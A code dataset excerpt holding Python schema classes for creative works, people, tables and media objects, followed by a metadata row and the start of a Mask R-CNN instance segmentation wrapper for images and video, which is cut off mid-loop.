issn: Optional[Array[str]] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if dateEnd is not None:
self.dateEnd = dateEnd
if dateStart is not None:
self.dateStart = dateStart
if issn is not None:
self.issn = issn
class Person(Thing):
"""A person (alive, dead, undead, or fictional)."""
address: Optional[str] = None
affiliations: Optional[Array["Organization"]] = None
emails: Optional[Array[str]] = None
familyNames: Optional[Array[str]] = None
funders: Optional[Array[Union["Organization", "Person"]]] = None
givenNames: Optional[Array[str]] = None
honorificPrefix: Optional[str] = None
honorificSuffix: Optional[str] = None
jobTitle: Optional[str] = None
memberOf: Optional[Array["Organization"]] = None
telephoneNumbers: Optional[Array[str]] = None
def __init__(
self,
address: Optional[str] = None,
affiliations: Optional[Array["Organization"]] = None,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
emails: Optional[Array[str]] = None,
familyNames: Optional[Array[str]] = None,
funders: Optional[Array[Union["Organization", "Person"]]] = None,
givenNames: Optional[Array[str]] = None,
honorificPrefix: Optional[str] = None,
honorificSuffix: Optional[str] = None,
id: Optional[str] = None,
jobTitle: Optional[str] = None,
memberOf: Optional[Array["Organization"]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
telephoneNumbers: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if address is not None:
self.address = address
if affiliations is not None:
self.affiliations = affiliations
if emails is not None:
self.emails = emails
if familyNames is not None:
self.familyNames = familyNames
if funders is not None:
self.funders = funders
if givenNames is not None:
self.givenNames = givenNames
if honorificPrefix is not None:
self.honorificPrefix = honorificPrefix
if honorificSuffix is not None:
self.honorificSuffix = honorificSuffix
if jobTitle is not None:
self.jobTitle = jobTitle
if memberOf is not None:
self.memberOf = memberOf
if telephoneNumbers is not None:
self.telephoneNumbers = telephoneNumbers
class Product(Thing):
"""
Any offered product or service. For example, a pair of shoes; a haircut; or
an episode of a TV show streamed online.
"""
brands: Optional[Array["Brand"]] = None
logo: Optional[Union[str, "ImageObject"]] = None
productID: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
brands: Optional[Array["Brand"]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
logo: Optional[Union[str, "ImageObject"]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
productID: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if brands is not None:
self.brands = brands
if logo is not None:
self.logo = logo
if productID is not None:
self.productID = productID
class PublicationIssue(CreativeWork):
"""
A part of a successively published publication such as a periodical or
publication volume, often numbered.
"""
issueNumber: Optional[Union[str, int]] = None
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
issueNumber: Optional[Union[str, int]] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if issueNumber is not None:
self.issueNumber = issueNumber
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
class PublicationVolume(CreativeWork):
"""
A part of a successively published publication such as a periodical or
multi-volume work.
"""
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
volumeNumber: Optional[Union[str, int]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None,
volumeNumber: Optional[Union[str, int]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
if volumeNumber is not None:
self.volumeNumber = volumeNumber
class Quote(Mark):
"""Inline, quoted content."""
cite: Optional[Union["Cite", str]] = None
def __init__(
self,
content: Array["InlineContent"],
cite: Optional[Union["Cite", str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
if cite is not None:
self.cite = cite
class QuoteBlock(Entity):
"""A section quoted from somewhere else."""
content: Array["BlockContent"]
cite: Optional[Union["Cite", str]] = None
def __init__(
self,
content: Array["BlockContent"],
cite: Optional[Union["Cite", str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if cite is not None:
self.cite = cite
class ResourceParameters(Thing):
"""
Describes limits or requested amounts for a particular resource (e.g.
memory or CPU).
"""
resourceLimit: Optional[float] = None
resourceRequested: Optional[float] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
resourceLimit: Optional[float] = None,
resourceRequested: Optional[float] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if resourceLimit is not None:
self.resourceLimit = resourceLimit
if resourceRequested is not None:
self.resourceRequested = resourceRequested
class SoftwareApplication(CreativeWork):
"""A software application."""
softwareRequirements: Optional[Array["SoftwareApplication"]] = None
softwareVersion: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
softwareRequirements: Optional[Array["SoftwareApplication"]] = None,
softwareVersion: Optional[str] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if softwareRequirements is not None:
self.softwareRequirements = softwareRequirements
if softwareVersion is not None:
self.softwareVersion = softwareVersion
class SoftwareSession(Thing):
"""
Represents a runtime session with the resources and image that are
required by software to execute.
"""
environment: "Environment"
cpuResource: Optional["ResourceParameters"] = None
memoryResource: Optional["ResourceParameters"] = None
volumeMounts: Optional[Array["Mount"]] = None
def __init__(
self,
environment: "Environment",
alternateNames: Optional[Array[str]] = None,
cpuResource: Optional["ResourceParameters"] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
memoryResource: Optional["ResourceParameters"] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
url: Optional[str] = None,
volumeMounts: Optional[Array["Mount"]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if environment is not None:
self.environment = environment
if cpuResource is not None:
self.cpuResource = cpuResource
if memoryResource is not None:
self.memoryResource = memoryResource
if volumeMounts is not None:
self.volumeMounts = volumeMounts
class SoftwareSourceCode(CreativeWork):
"""
Computer programming source code. Example: Full (compile ready) solutions,
code snippet samples, scripts, templates.
"""
codeRepository: Optional[str] = None
codeSampleType: Optional[str] = None
maintainers: Optional[Array[Union["Organization", "Person"]]] = None
programmingLanguage: Optional[str] = None
runtimePlatform: Optional[Array[str]] = None
softwareRequirements: Optional[Array[Union["SoftwareSourceCode", "SoftwareApplication", str]]] = None
targetProducts: Optional[Array["SoftwareApplication"]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
codeRepository: Optional[str] = None,
codeSampleType: Optional[str] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
maintainers: Optional[Array[Union["Organization", "Person"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
programmingLanguage: Optional[str] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
runtimePlatform: Optional[Array[str]] = None,
softwareRequirements: Optional[Array[Union["SoftwareSourceCode", "SoftwareApplication", str]]] = None,
targetProducts: Optional[Array["SoftwareApplication"]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if codeRepository is not None:
self.codeRepository = codeRepository
if codeSampleType is not None:
self.codeSampleType = codeSampleType
if maintainers is not None:
self.maintainers = maintainers
if programmingLanguage is not None:
self.programmingLanguage = programmingLanguage
if runtimePlatform is not None:
self.runtimePlatform = runtimePlatform
if softwareRequirements is not None:
self.softwareRequirements = softwareRequirements
if targetProducts is not None:
self.targetProducts = targetProducts
class StringSchema(Entity):
"""A schema specifying constraints on a string node."""
maxLength: Optional[float] = None
minLength: Optional[float] = None
pattern: Optional[str] = None
def __init__(
self,
id: Optional[str] = None,
maxLength: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minLength: Optional[float] = None,
pattern: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if maxLength is not None:
self.maxLength = maxLength
if minLength is not None:
self.minLength = minLength
if pattern is not None:
self.pattern = pattern
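A `StringSchema` only declares constraints; applying them to a value takes a small validator along these lines (the `validate_string` helper below is an illustrative assumption, not part of this module):

```python
import re
from typing import Optional

def validate_string(value: str, maxLength: Optional[float] = None,
                    minLength: Optional[float] = None,
                    pattern: Optional[str] = None) -> bool:
    """Check a string against StringSchema-style constraints."""
    if maxLength is not None and len(value) > maxLength:
        return False
    if minLength is not None and len(value) < minLength:
        return False
    # Treat `pattern` as a regular expression that must match the whole value.
    if pattern is not None and re.fullmatch(pattern, value) is None:
        return False
    return True
```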
class Strong(Mark):
"""Strongly emphasised content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Subscript(Mark):
"""Subscripted content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Superscript(Mark):
"""Superscripted content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Table(CreativeWork):
"""A table."""
rows: Array["TableRow"]
def __init__(
self,
rows: Array["TableRow"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if rows is not None:
self.rows = rows
class TableCell(Entity):
"""A cell within a `Table`."""
content: Array["InlineContent"]
cellType: Optional["ECellType"] = None
colspan: Optional[int] = None
name: Optional[str] = None
rowspan: Optional[int] = None
def __init__(
self,
content: Array["InlineContent"],
cellType: Optional["ECellType"] = None,
colspan: Optional[int] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
rowspan: Optional[int] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if cellType is not None:
self.cellType = cellType
if colspan is not None:
self.colspan = colspan
if name is not None:
self.name = name
if rowspan is not None:
self.rowspan = rowspan
class TableRow(Entity):
"""A row within a Table."""
cells: Array["TableCell"]
rowType: Optional["ERowType"] = None
def __init__(
self,
cells: Array["TableCell"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
rowType: Optional["ERowType"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if cells is not None:
self.cells = cells
if rowType is not None:
self.rowType = rowType
class ThematicBreak(Entity):
"""
A thematic break, such as a scene change in a story, a transition to
another topic, or a new document.
"""
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
class TupleSchema(Entity):
"""A schema specifying constraints on an array of heterogeneous items."""
items: Optional[Array["SchemaTypes"]] = None
def __init__(
self,
id: Optional[str] = None,
items: Optional[Array["SchemaTypes"]] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
class VideoObject(MediaObject):
"""A video file."""
caption: Optional[str] = None
thumbnail: Optional["ImageObject"] = None
transcript: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
thumbnail: Optional["ImageObject"] = None,
title: Optional[Union[str, Array["Node"]]] = None,
transcript: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if thumbnail is not None:
self.thumbnail = thumbnail
if transcript is not None:
self.transcript = transcript
"""
Union type for valid block content.
"""
BlockContent = Union["CodeBlock", "CodeChunk", "Heading", "List", "ListItem", "Paragraph", "QuoteBlock", "Table", "ThematicBreak"]
"""
Union type for all CreativeWork types.
"""
CreativeWorkTypes = Union["CreativeWork", "Article", "AudioObject", "Collection", "Datatable", "Figure", "ImageObject", "MediaObject", "Periodical", "PublicationIssue", "PublicationVolume", "SoftwareApplication", "SoftwareSourceCode", "Table", "VideoObject"]
"""
Union type for valid inline content.
"""
InlineContent = Union[None, bool, int, float, str, "CodeFragment", "CodeExpression", "Delete", "Emphasis", "ImageObject", "Link", "Quote", "Strong", "Subscript", "Superscript", "Cite", "CiteGroup"]
"""
Union type for all valid nodes.
"""
Node = Union[None, bool, float, int, str, Array[Any], Dict[str, Any], "Entity"]
"""
Union type for all data schemas.
"""
SchemaTypes = Union["ConstantSchema", "EnumSchema", "BooleanSchema", "NumberSchema", "IntegerSchema", "StringSchema", "ArraySchema", "TupleSchema"]
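The classes above all share one constructor idiom: optional attributes are declared with class-level defaults and assigned in `__init__` only when a non-None value is passed, so an instance's `__dict__` stays small and an explicit `None` never shadows the class default. A stand-alone sketch of the idiom (the `Example` class is illustrative only):

```python
from typing import Optional

class Example:
    pagination: Optional[str] = None  # class-level default

    def __init__(self, pagination: Optional[str] = None) -> None:
        # Assign only when a value was provided, mirroring the generated classes.
        if pagination is not None:
            self.pagination = pagination

e1 = Example()                    # no instance attribute created
e2 = Example(pagination="1-10")   # instance attribute set
```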
| 32.245803 | 258 | 0.571375 | 7,904 | 80,679 | 5.76746 | 0.057692 | 0.052055 | 0.069758 | 0.052757 | 0.785811 | 0.767867 | 0.74898 | 0.737354 | 0.705831 | 0.639473 | 0 | 0.000072 | 0.312969 | 80,679 | 2,501 | 259 | 32.258697 | 0.822349 | 0.0427 | 0 | 0.7406 | 1 | 0 | 0.060821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030462 | false | 0 | 0.002856 | 0 | 0.151832 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0b556170871510fed668f85e96cb960bac63535 | 26,884 | py | Python | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 81 | 2020-11-21T07:21:38.000Z | 2022-02-14T18:31:55.000Z | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 10 | 2020-12-01T13:00:48.000Z | 2021-07-18T10:40:01.000Z | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 23 | 2020-11-24T06:30:23.000Z | 2021-07-05T01:37:58.000Z | import cv2
import numpy as np
import random
import os
from .mask_rcnn import MaskRCNN
from .config import Config
import colorsys
import time
class configuration(Config):
NAME = "configuration"
coco_config = configuration(BACKBONE = "resnet101", NUM_CLASSES = 81, class_names = ["BG"], IMAGES_PER_GPU = 1, IMAGE_MAX_DIM = 1024, IMAGE_MIN_DIM = 800, IMAGE_RESIZE_MODE ="square", GPU_COUNT = 1)
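`colorsys` is imported here because instance masks are typically drawn in visually distinct per-instance colors; a common approach (this `random_colors` helper is an assumption about what the display functions do, not a verbatim copy) spaces hues evenly in HSV and converts each to RGB:

```python
import colorsys
import random

def random_colors(n: int, bright: bool = True, shuffle: bool = False):
    """Generate n visually distinct RGB colors from evenly spaced hues."""
    brightness = 1.0 if bright else 0.7
    hsv = [(i / n, 1.0, brightness) for i in range(n)]
    colors = [colorsys.hsv_to_rgb(*c) for c in hsv]
    if shuffle:
        # Shuffling decorrelates adjacent instance ids from adjacent hues.
        random.shuffle(colors)
    return colors
```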
class instance_segmentation():
def __init__(self):
self.model_dir = os.getcwd()
def load_model(self, model_path):
self.model = MaskRCNN(mode = "inference", model_dir = self.model_dir, config = coco_config)
self.model.load_weights(model_path, by_name= True)
def segmentImage(self, image_path, show_bboxes = False, output_image_name = None, verbose = None, custom=None):
image = cv2.imread(image_path)
new_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# Run detection
if verbose is not None:
print("Processing image...")
results = self.model.detect([new_img])
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(image, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(image, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
def segmentFrame(self, frame, show_bboxes = False, output_image_name = None, verbose = None, custom=None):
new_img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
if verbose is not None:
print("Processing frame...")
# Run detection
results = self.model.detect([new_img])
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
def process_video(self, video_path, show_bboxes = False, output_video_name = None, frames_per_second = None, custom=None):
capture = cv2.VideoCapture(video_path)
length = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
print(f'\nThere are {length} frames in this video')
print('-' * 20)
print('Detecting Objects in the Video... Please Wait...')
print('-' * 20)
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
